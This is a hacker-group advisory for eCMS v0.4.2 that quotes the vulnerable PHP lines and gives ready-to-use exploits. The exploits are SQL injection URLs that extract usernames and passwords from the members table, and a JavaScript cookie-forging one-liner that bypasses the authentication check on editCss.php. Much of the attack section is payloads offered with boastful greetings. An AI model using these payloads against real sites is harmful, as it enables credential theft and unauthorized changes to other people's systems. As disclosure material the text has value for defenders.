|
=0D
=0D
#######################################################################################=0D
# #=0D
# ...::::eCMS-v0.4.2 (SQL/PB) Multiple Remote Vulnerabilities ::::... # =0D
#######################################################################################=0D
=0D
Virangar Security Team=0D
=0D
www.virangar.net=0D
=0D
--------=0D
Discoverd By :virangar security team(hadihadi)=0D
=0D
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra=0D
=0D
& all virangar members & all hackerz=0D
=0D
greetz:to my best friend in the world hadi_aryaie2004=0D
& my lovely friend arash(imm02tal) =0D
-----=0D
1.sql injection:=0D
-------vuln codes in:-----------=0D
index.php:=0D
line 52:$p = $_GET['p']=0D
..=0D
..=0D
line 55:$query = "SELECT * FROM files WHERE cat = '$p' ORDER BY date DESC";=0D
---=0D
exploit:=0D
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/**/where/**/id=1/*=0D
or=0D
http://site.com/[patch]/index.php?p='/**/union/**/select/**/1,concat(username,0x3a,char(58),password),3,4,5,6/**/from/**/members/*=0D
#####################=0D
2. Remote Permission Bypass Vulnerability(Insecure Cookie Handling ):=0D
-------vuln codes in:-----------=0D
editCss.php:=0D
=0D
line 17:if(!isset($_COOKIE['pass']))=0D
{=0D
echo('You\'re not allowed to come here! Go back!');=0D
} else {=0D
....=0D
...=0D
...=0D
-------=0D
/*=0D
if the cookie didn't set for you, you can't allow to see this page..but if we do somethings :) such as :=0D
=0D
javascript:document.cookie = "pass=1; path=/";=0D
=0D
now the cookie is set for you, and you can allow to see the page and edit the CSS in file "style.css"=0D
*/=0D
exploit:=0D
just open your browser and then type:=0D
javascript:document.cookie = "pass=1; path=/";=0D
now see the "editCss.php" and edit the cms CSS :D=0D
-----=0D
young iranian h4ck3rz=0D
=0D
=0D
=0D
=0D
=0D
=0D